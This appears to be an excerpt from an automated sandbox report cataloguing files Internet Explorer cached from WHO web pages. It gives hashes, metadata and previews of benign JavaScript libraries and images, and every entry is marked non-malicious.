                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):14327
                                                                                                                                                                    Entropy (8bit):5.146561151612493
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:e3q5RUfWqxsurJV8/K+yeVQKxfidn452s92s3x/:e3q06K+yeVQKxd52sUA
                                                                                                                                                                    MD5:1F0F279A8200CF6E721AB08CA1C81639
                                                                                                                                                                    SHA1:67F7E2AB2B22308BE9DF864985A34059318E7EDF
                                                                                                                                                                    SHA-256:2C899B196A3DC020D87ACBEAE74C777D20B14FF8DD9A39F2BC79558D3DDD6D2D
                                                                                                                                                                    SHA-512:3AF8919BCC68F86525288A0233902603648BF87F4E0877C05708A57458C09EDB3E63377252F25D5F7AE9B8CF150C88A86ADD5759721E9FEF5B2CE131E4537D57
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/picturefill.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: ./*! picturefill - v3.0.2 - 2016-02-12.. * https://scottjehl.github.io/picturefill/.. * Copyright (c) 2016 https://github.com/scottjehl/picturefill/blob/master/Authors.txt; Licensed MIT.. */..!function (a) { var b = navigator.userAgent; a.HTMLPictureElement && /ecko/.test(b) && b.match(/rv\:(\d+)/) && RegExp.$1 < 45 && addEventListener("resize", function () { var b, c = document.createElement("source"), d = function (a) { var b, d, e = a.parentNode; "PICTURE" === e.nodeName.toUpperCase() ? (b = c.cloneNode(), e.insertBefore(b, e.firstElementChild), setTimeout(function () { e.removeChild(b) })) : (!a._pfLastSize || a.offsetWidth > a._pfLastSize) && (a._pfLastSize = a.offsetWidth, d = a.sizes, a.sizes += ",100vw", setTimeout(function () { a.sizes = d })) }, e = function () { var a, b = document.querySelectorAll("picture > img, img[srcset][sizes]"); for (a = 0; a < b.length; a++) d(b[a]) }, f = function () { clearTimeout(b), b = setTimeout(e, 99) }, g = a.matchMedia && matchMedia("(orie
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\select2.full.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):76272
                                                                                                                                                                    Entropy (8bit):5.376525345010871
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:P2oLNdg5pTT9aPCExIDiMd9QHhdvKGBokOl/NzTTeUBo47R0eq/OKnZprIf45w0F:xrWVEqDiMd9gekOZnlqGOHrAAg/KHHB
                                                                                                                                                                    MD5:37BEFED5B538FBAC224C5166E32F801B
                                                                                                                                                                    SHA1:4C3B2F9498A8CF39D3A4950277992C104514F86B
                                                                                                                                                                    SHA-256:9FF15425CA7BDB0F367EE5613EE729D7DC8108295F7E3D646100408F81E33C84
                                                                                                                                                                    SHA-512:638FAEF93FFA0E90DBD80913AF1B3778988DF68FEEFA5F292CDB7495244A9C97B6C080D50B077B37C69FCBEEF43E6AF916D9A85F92179B02BA1FB2656FC371F0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/select2.full.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: /*! Select2 4.0.6-rc.1 | https://github.com/select2/select2/blob/master/LICENSE.md */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=function(b,c){return void 0===c&&(c="undefined"!=typeof window?require("jquery"):require("jquery")(b)),a(c),c}:a(jQuery)}(function(a){var b=function(){if(a&&a.fn&&a.fn.select2&&a.fn.select2.amd)var b=a.fn.select2.amd;var b;return function(){if(!b||!b.requirejs){b?c=b:b={};var a,c,d;!function(b){function e(a,b){return v.call(a,b)}function f(a,b){var c,d,e,f,g,h,i,j,k,l,m,n,o=b&&b.split("/"),p=t.map,q=p&&p["*"]||{};if(a){for(a=a.split("/"),g=a.length-1,t.nodeIdCompat&&x.test(a[g])&&(a[g]=a[g].replace(x,"")),"."===a[0].charAt(0)&&o&&(n=o.slice(0,o.length-1),a=n.concat(a)),k=0;k<a.length;k++)if("."===(m=a[k]))a.splice(k,1),k-=1;else if(".."===m){if(0===k||1===k&&".."===a[2]||".."===a[k-1])continue;k>0&&(a.splice(k-1,2),k-=2)}a=a.join("/")}if((o||q)&&p){for(c=a.split("/"),k=c.length
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\step-tabs.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2202
                                                                                                                                                                    Entropy (8bit):4.890668908980952
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pMDyFn0U9Eewl+H8XtIcQ0cE6yVS8kV82RHyuOK6IXA3aAIsDf:GDOn0w/c+H8XmcQ0w78kV82RHyuh3A3P
                                                                                                                                                                    MD5:CC8ED9DF753A06A20E4D38DC2525FB79
                                                                                                                                                                    SHA1:F61602D0CB38394569C038FBD060ABF63A92F580
                                                                                                                                                                    SHA-256:DE010FA266434EBAE4DFCE314553CAE937EC4977593B91DF45DDB3EAFB8EBA47
                                                                                                                                                                    SHA-512:E4058F5E27FEF8FC8A603FC0B92828717AB612442E62918540DAC9A24AB01A4020FDC41FFA44B9A9ACF41921BE1F59FA700675D13BB432AC3251A53EEF695E03
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/step-tabs.min.js
                                                                                                                                                                    Preview: "use strict";!function(window){if(document.body.classList.contains("sfPageEditor"))console.log("Editor Mode detected...");else{var tabHeaderSelector=".sf-step-tabber__tab-header-wrapper";document.querySelectorAll(".sf-step-tabber").forEach(function(tabber){tabber.tabHeaderList=[],tabber.tabInnerList=[],tabber.currentTabIndex=0,tabber.allTabs=tabber.querySelectorAll(".sf-step-tabber__single-tab-wrapper"),tabber.headerList=tabber.querySelector(".sf-step-tabber__ul-list"),tabber&&tabber.headerList&&1<tabber.allTabs.length&&function(tabber){(function(tabber){tabber.allTabs.forEach(function(currentTab){var currentHeader=currentTab.querySelector(tabHeaderSelector),li=document.createElement("li");tabber.headerList.appendChild(li),li.classList.add("header_li"),tabber.tabInnerList.push(currentHeader),li.appendChild(currentHeader.cloneNode(!0)),tabber.tabHeaderList=tabber.headerList.querySelectorAll(".header_li")})})(tabber),function(tabber){_addListenersToAll(tabber,tabber.tabHeaderList),_addLi
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\syria4[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 636x424, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):82358
                                                                                                                                                                    Entropy (8bit):7.989082270648955
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:i5BTrA7tn+P5DLD34aQUEF6ws/erz2nsa/h7CbjMqRMhI9LCSDmQ+PGj3VRzrrh:OXOVo/DNjbws/eJihGb/59GOmbejHzrt
                                                                                                                                                                    MD5:7DFD560C67882350865BDDCF94A0E5FD
                                                                                                                                                                    SHA1:13E22004A190A3D771BA385008EA3DF3DD8F24EA
                                                                                                                                                                    SHA-256:2C9F01E6F8CBBB782E59D598B6F587F7B524CE3027902E981EEA7B17CB4DEEDE
                                                                                                                                                                    SHA-512:72ADE60E60D0382E99EA827CD6BC4106B27AF4DC1564B84AB13E0D915F34916051DEC32D45A9FEDE0FB6B369945DA27CBB3EFAAE4E6E310F1FEC2B8FDAFD33A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/imported/syria4.tmb-768v.jpg?Culture=en&sfvrsn=2109b312_30
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.........................................................................|.."...............................................................................T.$.$.$.$.$.$.$.$.$.$.$.$.$.$..!......5.qwnK..t.k<..3.qh'....f......v.....\..]*..MB..5t].g...]..gOd.N$.B.T..^..Cb.T.QRO.....s..I+.. I I.,.)BI*.H.H.H.H.H.H.H.H.C.qyU...qq.....ksT..cpk.....d.{I...Qz.+`.l....=..\..e...7#x9q..w..G.5C./....]:.ILa3.+*(.tL.....y-.w..$.U(..)i..U...Z4..OW&...$.$.$.$.%..c. L..........T.W7~.$8.XV....h1}..|.L..1.3:...l.L...T.(V..kQ3....k.W.k.i.1.ox._...Dg.;...|r.v.....].eK..$....:..v...P*.D...T:..o......}d.f..nt...7..:.\.]G_/Z;..1.n..(".....>.x7Cn.Qb=K;.jk.+..$~e...y....)..5$B0:dW!.f.HhO/...n..a.7OU......2.....1%...4..0.h....f.+.M]j=g...'(.p..N...n.....%..}...Z)....]....A.].g..W.U.9..Ke..Y....9....5.....B.sa.^WU.....QR.2..<q..A..Dr@.&...Cfq.b`......j..BP........tu&....jH.w.V.:....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\thumbnail[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x460, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):17485
                                                                                                                                                                    Entropy (8bit):7.796617975598513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:Msb1Ad12Y+ZJbJQEgjDASt8+c3PhJGz8dtkdyyQJDrt:Fb2d1EQEgPAStllTyRJd
                                                                                                                                                                    MD5:23B31DF85EA22577B1D53348C2A534DD
                                                                                                                                                                    SHA1:0E9B8D58173E82DC2E61524404A6A66DE22DF68D
                                                                                                                                                                    SHA-256:6057B63458CE651F821F50F3E517A9E90988A673888365EABE079C0F6DD54A7A
                                                                                                                                                                    SHA-512:DB427410EEA6F423EA655971F36A13E088E23C6DB7D978ECC63B11B5D35ECBE7E5FCBFED5EE637277F61F66E001D1D47274700C8ABFCAFE5E83C3EA9085CC2B2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/science-in-5/thumbnail.tmb-768v.jpg?Culture=en&sfvrsn=78d4d94a_2
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"........................................................................................................................................'........................................8..o...7... ..................... ............Z.wd.).U....f..w6d..^~.................H$..`.............&b...`..7.k.f0..6,.S..&...................................!Ff.=.L..=.....p..6,.W..&....................$....@ .........sz...3.5.E....\.......[.^]u..p@..............@..@ ..........~.+............7......3........................@ ........r...q}`_.t..........s..my..k.f]~.|y..........................$.q=.L..&............9......6...............................3.=.XD.,.......$......`~..9...Y./...B...............@$.....=8=.?X\._.....z.y....]..........zk9.4....%.a.0..R.a.Lk-...x..:.V..?..i....=...f.....<v...&{.^\...B....................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\www-embed-player[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):165574
                                                                                                                                                                    Entropy (8bit):5.585249063675957
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:lhb0saDkMkUDzIadG/VAOVee5aikaHBNrLQ29L9ZPIyGAoJWjTTgSUHn8Cx50gyv:mRYESZDIo6AoJGTMtOc9F212fGqVQ
                                                                                                                                                                    MD5:9D9651855E2D8D103A3C372122FF32F3
                                                                                                                                                                    SHA1:7C6C1CF8C9F612F3FF96EB8E47A8349E4631761B
                                                                                                                                                                    SHA-256:ECE51F8EF5350CDA743D5A08859A2E35449E567EFEB91ABED07280497444168A
                                                                                                                                                                    SHA-512:6759D8D892B4254593DDC6D4A120461A899E4A368B93A16EDBD80374795F17520CC98D34776745304F88328F37B531C08F2ECCC5658FA81AD272760FA2A0B4DE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/www-embed-player.vflset/www-embed-player.js
                                                                                                                                                                    Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function t(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(e){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c("jscomp_symbol_"
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\1[1].txt
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):28012
                                                                                                                                                                    Entropy (8bit):4.885124285048976
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:LYm1EGM4mgpbsoNH7+fpMESfuTG6iMdLuWq79K0toZC5c+YP3XQN:L/1EGMfgpbskH7+fpMESfuDiMdLuWq7J
                                                                                                                                                                    MD5:A3D71361D63D379E720F8896C7AA85C0
                                                                                                                                                                    SHA1:FC40960FF7100A9E4BCE4D6E2D094668C6DD7DBC
                                                                                                                                                                    SHA-256:C72545B609C71F570847F39130B7BEBB0549FDB52DA03FB6BB8F974F6C407035
                                                                                                                                                                    SHA-512:2B1C825398513257965ECA85158432855D7CDA270782AB753033671310DDCD8F4A95298AB95746AF17809BBC5C644B8E13E20EBCBB87EA4E06F72F27A933CFD8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://v1.addthisedge.com/live/boost/ra-5803f964fe6c9599/_ate.track.config_resp
                                                                                                                                                                    Preview: _ate.track.config_resp({"pc":"flwi,shin","customMessageTemplates":[],"pro-config":{"_default":{"widgets":{"flwi":{"thankyou":false,"orientation":"horizontal","shape":"square","widgetId":"970d","services":[{"service":"rss","usertype":"user","id":"http://www.who.int/about/licensing/rss/en/index.html"},{"service":"youtube","usertype":"user","id":"whosoutheastasia"},{"service":"twitter","usertype":"user","id":"WHOSEARO"},{"service":"facebook","usertype":"user","id":"WorldHealthOrganizationNepal"},{"service":"instagram","id":"who.searo","usertype":"user"},{"service":"linkedin","id":"world-health-organization","usertype":"company"}],"title":"","__hideOnHomepage":false,"borderRadius":"46%","size":"large","elements":".addthis_inline_follow_toolbox_tsza_970d","creationTimestamp":1588925397087,"iconColor":"#FFFFFF","hideDevice":"none","id":"flwi","postFollowTitle":"Thanks for following!","toolName":"Follow button Nepal English"},"shin":{"hideEmailSharingConfirmation":false,"buttonColor":"#FFFFFF
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 131x44, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2414
                                                                                                                                                                    Entropy (8bit):7.787323077249669
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:7vymuERAeQjEWPITymowwidAUP2KNbqhqYGqUZLss2NrXTV6:EEMEWwy57I/FNbZEUZL4No
                                                                                                                                                                    MD5:198FD11DE3180F22F1F5102674C8EA7F
                                                                                                                                                                    SHA1:7C9CAF6BF835002FFF03382FE1A32312ACD646F6
                                                                                                                                                                    SHA-256:063C54795DE354A6F339EA91CA431193AE772CA3175CE48633D9BF50091CD988
                                                                                                                                                                    SHA-512:CAB6BE7D84EFDFB06E9177C72CE8BC7A8EB94B172A8214A4A7CAAC5779CB831255E5972AFEFEE4B3C5FF02E221FFD86CB1AED377B54B35A09106ECE4BDA8CE22
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-131v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................,...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}Mh.&..ZMwch.C."G....{.J.S.A.M.-Z)$...`...c^k....,%.i....|?.C3.....f..G.d..2}Mz.../......y..Ky.O.6..T....NO.h.6.mw.A.^..`..U..#=...&.............K..9S.-.......t.K......ig......{....Z..2...n.@.....s.Wom.X|?.....Y$..w.?.F....G..;.J....^Q..:..gM;.I.[...=L..FK...?..Kr.].-<r.<.J.$..:...).>...J..u....Eaow6...mbX....=*-o.%.d......&H.$./...#.v.7..+.W..}."....9U...
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\3-wha71-dg-tedros-opening-speech[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 549x366, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15077
                                                                                                                                                                    Entropy (8bit):7.9603925935569935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:CQbHe1HR9+4CmaGno7SNMu1sKKUEgId3ayKRuGZCrS53GDCRSF6PuKKVk:VHEy4vzcduW2EBd3krsrSxGaSgPn
                                                                                                                                                                    MD5:9009C44BC8E9FAEE76F70B7B101249DE
                                                                                                                                                                    SHA1:81A54CE9EE2498C4D9653BA8310B0FC4AB29EB04
                                                                                                                                                                    SHA-256:EE21101FF1A923124E465B4BFF58692B5C43BB6DD97DB386C42DB6B5495D15B2
                                                                                                                                                                    SHA-512:40735D7E2AE8DB23CCE5139415CA6774B0019FD0BDBE8FDB952F3C0D8CFE7E392F07BB89FC16F7096FCD184E1FD2F69ED148EBE84BB1635819EA3563282DAE51
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-549v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......n.%..".....................................................&.!.F.!.....Q....P..%kX.$........C..N.#E.E....D.....DZ.`....v..XA..`.dM..@.*........D.......a.vtv[....r&.#E.*.....D1.TE.V.w.;......V.K..+..1d.UD!T.Q.U..aU...'x.r..x.>...&Z6....E...",& ..!.^}.....Q.g..6n.Ce.F`!!Ud*...&*.DRUS6....X...]..T..>...}=M....b...C.@...L....Y.(b..Q...6.w..Y[..z.@...V...EU.Urm.;..@.."...|.;....../...,.....@.U....h...l..`XY.U|.N...y........(..E.,.......=....$,$........=.OE.|.a..*..U.@..C.q.`= %....$.E............9.5]$*..A.U....rje.....HU....-.s....N.:},..4[.k...U@X(..a.2iu..1r...HJ._).e...x<.^......_.K.+@Z*....4..C.9.....X..z..n....D.....Y.Q-..E2*....tX...B.*.!e.yO@y.Kp..?_.P.*..v..&V.......Ox.fPX.,.......uttx....^...r..U.....2.r..b..%PHJ...{...../..`....N|.=...*.h.=....,.I*.a`.-..g.<......`P. .B(.Ef.W..U...;...(..0^G..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\992x312-pag-coronavirus-2[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 479x303, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):31753
                                                                                                                                                                    Entropy (8bit):7.971456747037656
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:dYQXyaadLzkm5bLaJWCWhnj4/5ZcswGasho3:uuRgVLQWhj4/5ZiOho3
                                                                                                                                                                    MD5:3A7E45BE0E2DCFAC5CF5B60CFAE8621C
                                                                                                                                                                    SHA1:62BBB64EF8A150F6E78579855A42D650A0FBE0D5
                                                                                                                                                                    SHA-256:3C3FBE6D5EC98B49A575AC2E712A4F7F4252463525DFDD4B84EFB1C9B86EB678
                                                                                                                                                                    SHA-512:93F2AB40F969860E86E2BB4C73F3521AC1797D94D5465765871A4CFCD0A0852924E2D1B4064A9EA4324ECA97AF303FCF7F6760F2C27005BC8206F68FE11D4717
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-479v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222....../...."..................................................3....8.......f..A.~f8"..o5....z.E.&... WA.$^....E.....B.......j5......Q.............0^..j.G._....-..aY...ED.K!......m.0...CJe......^.Kh...Y.....or7.,F...\.@-h.gr2x..m.$<6/........=...j...tN2..G%;.."...%v...R..jIB..OY.{..Q...H.Z...8..].TTU..3..e......:..1..b,j...+Q.....Xw..3...(.......X.H.G..lO.5...O.z%.....)/+).-[............;.q0..I.g.t.f%.(kG..K5.....^t:.....h..S(...NE#..S....kk<H-..I.YM>$K#..d..;i.Q..........=I.....'"*0.AU..\.....2S....C....1.a..`.L.. N.eD..<.}..Z..^.f6.3o.."]...DAX..Y..S..K..$..,..ttF...Q....g_....P...f.^F.x^........jO.bh3.....J.g.B.....h....y.'.+/Hm...8.H,5p{....*.Hfr....y.+.ga.7.k...X..-=......Jy.k...4...3.7...n.Hb.MJ..w...u...J...o....zQ.hnq"*...ub..M..4.5..k.`..e...,u....he.L%.s...us......Z.O?...[T..^l<tt...
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x365, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):46216
                                                                                                                                                                    Entropy (8bit):7.985513256270707
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:5Ivujv8jfYYv+QCcFNTjHv/dbaV4r96saj8VV7vd+Yd7oZ2yKg/imTS62PflDso8:5iujv8jfFv+QptP/dR6saj+V7vdzFMck
                                                                                                                                                                    MD5:70C0C39E1C30AC0717DCC64110E5C447
                                                                                                                                                                    SHA1:CB61083CB628C3CD598CA85A9097C7C3AD4DCB46
                                                                                                                                                                    SHA-256:4DB6FE462365A1E502CA6330F25BD477299B962DCAF6DEAA57351B5BA2F3716B
                                                                                                                                                                    SHA-512:EB917EBF196491FC8BF9A56626FCB6D138AF28CD1E19DA85696630C08FBE3A9281BD27592354F9A30E32B183970FDFCB38CBD542CABDDA6BAFADAD63A4ECA663
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-549v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................m.%.."..............................................................................f....jh......I.X..p.=F...A.....k*.*k+..^vr..}mV7k..RX....hr:.x......d.ym..@.b.:..L..S.....`..\.I.`..a.}..Z......-....)EN:*....i..k..Z#..X.$..}.....m$.|.c*.$b...(.......YMB...Ri...-o.5.L.8..;....7...I.\.....r.z....Nv..}.k....Y.....O&.[.VP.......z..1..~.S.3....yV-....-q...m......4.|..eYlw.:.l$.p.M..o...t!{.S|>..._N)._.<=,o.3.k(..T.q.7.]l9...2<.&sR...2..!....\..Qu.wY.....k.bm./IX].Q.Z...g....W.Ae..("......g.......9....n.l`#.X.m...`6g...........`...I1.H..%{J..=..4.Q....-.....1.q.D.%.]...x].....u.@..)...=......z..).-.Ke...0.,..^t>.Fy.....X.h..''..#|....).....gzG.3,..y..s..;k...7.a.....~w>..~r..9..........'}7....&.0..5..N.....<N..Z..>.#.m......p..L.......|.?O5..&..L.[Q.u.g_...#..T.d..ODa.%.._Z.......j.}.=yc.^S.-.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x319, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36696
                                                                                                                                                                    Entropy (8bit):7.981838750647916
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:zqH7Rp2TmFyVZHU3RwoB7P7GkZJhc2BEyzR1s7zexPOwEI5y5DRPBFI6Nba:2H7RUTmFgHU3DB7PikZg2GExPLEsy5tY
                                                                                                                                                                    MD5:444D84B6DC67BDC55E425A7E8B173E5E
                                                                                                                                                                    SHA1:F088E60BD16CD7D6D242F016ABE902A5A3522323
                                                                                                                                                                    SHA-256:40975B9ED5BCB47F1C774A3CC0A3B3EEF87D630AFC77408053E88F24D9C4859A
                                                                                                                                                                    SHA-512:9EC8E9D8149659E3B69ECB20BF2BB3EB03E599B3F43CB58738EBF464748FC14AC1E8B8A3379D872DBD04DE8D3CB85FE41D23108DC793608D355544939FFB7290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-479v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................?...."...............................................................................b..@=\eyt..a6.).!ur..yt_y..C.X.t;.f...j.0;.Y./.;...kQ.r......~.}V;A....t(}.....l....|.....(.W.U.Z..3.K...)Lm.#E.+i...d.D..G.G...V..F.I..*.=x...=.y..2.S.Yx.R..l..@V.u.f.t..>l..\.8u....~.......YY3....;.R.......L...+......'?.(..KY{..n...n.,)Y...:?..{....2._4g......i...$..2b.Sz.>..m~w....u..B...%._>E.Ad...']YZ.....8}.v..+..Z........A.a....s.Q^~.Z...6X.k.g4C.c..OY.<.k]..0.j.q...q..E.......YV..`.K.u.......8A..U.........p.:.F.E...je^...Y...x.5......P....y..we.a...Q.t@v.2.U:......Ok6....;...:,.wy}6#}#.?......8y....wL..9......}..}..*.<.cRI..'.d....g&..E.!....j.S..dG.\.....>%.P...f.C..Y.e-...+i%...Kx..lD....J..].-..........p..~..(.$.N.$.N..w.Q.Q...kd.eC.wl.&3s..]...e_+....-Hi.".ox...7.....[.v.6....a.D.RO;/*..w
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ScriptResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):253609
                                                                                                                                                                    Entropy (8bit):5.142800237248841
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:RkvBNnLO1wG0qOOO8D5BnAcKcv1/i/fXMS6PuQr1Q7SV7opS:8LODl6c/KuS6Px
                                                                                                                                                                    MD5:029E5E7227E947922B06EC41A1742BA1
                                                                                                                                                                    SHA1:C2FC0DA1AD13727E1CE25193ED6BF67BF72F610A
